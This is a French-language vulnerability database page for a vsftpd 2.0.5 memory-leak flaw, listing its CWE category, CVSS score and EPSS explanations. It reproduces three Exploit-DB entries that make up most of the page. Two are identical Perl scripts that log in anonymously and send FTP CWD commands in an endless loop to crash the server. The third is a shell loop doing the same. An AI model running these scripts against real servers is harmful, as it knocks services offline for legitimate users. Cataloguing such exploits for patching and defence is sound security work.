Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-399 |
Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
7.1 |
|
AV:N/AC:M/Au:N/C:N/I:N/A:C |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 5814
Date de publication : 2008-06-13 22h00 +00:00
Auteur : Praveen Darshanam
EDB Vérifié : Yes
#!/usr/bin/perl -w
#######################################################################################
# vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8,
# Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability.
#
# Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration
# option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed.
#
# I tried to modify local exploit found at securityfocus such that we can remotely exloit
#
# Author shall not bear any responsibility
# Author: Praveen Darshanam
# Email: praveen[underscore]recker[at]sify.com
# Date: 07th June, 2008
#
#
########################################################################################
use Net::FTP;
$ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n";
$ftp -> login("anonymous","anonymous") || die "Could not Login...Retry";
while(1)
{
#this loop runs infinitely
$ftp -> cwd();
}
$ftp->quit;
# milw0rm.com [2008-06-14]
Exploit Database EDB-ID : 31818
Date de publication : 2008-05-20 22h00 +00:00
Auteur : Martin Nagy
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/29322/info
The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.
Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.
# echo deny_file=foo >> /etc/vsftpd/vsftpd.conf
# service vsftpd restart
$ cat > memtest.sh <<EOF
EOF
#!/bin/bash
echo USER anonymous
echo PASS foo@bar.com
while [ 1 ]; do
echo CWD pub
echo CWD ..
done
EOF
Exploit Database EDB-ID : 31819
Date de publication : 2008-05-20 22h00 +00:00
Auteur : Praveen Darshanam
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/29322/info
The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.
Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.
#!/usr/bin/perl -w
#######################################################################################
#vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8,
#Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability.
#
#Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration
#option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed.
#
#I tried to modify local exploit found at securityfocus such that we can remotely exloit
#
# Author shall not bear any responsibility
#Author:Praveen Darshanam
#Email:praveen[underscore]recker[at]sify.com
#Date:07th June, 2008
#
#
########################################################################################
use Net::FTP;
$ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n";
$ftp -> login("anonymous","anonymous") || die "Could not Login...Retry";
while(1)
{
#this loop runs infinitely
$ftp -> cwd();
}
$ftp->quit;
Products Mentioned
Configuraton 0
Redhat>>Enterprise_linux >> Version 5.0
Redhat>>Fedora >> Version 6
Redhat>>Fedora >> Version 7
Redhat>>Fedora >> Version 8
Foresight_linux>>Appliances >> Version *
Rpath>>Appliance_platform_agent >> Version *
Références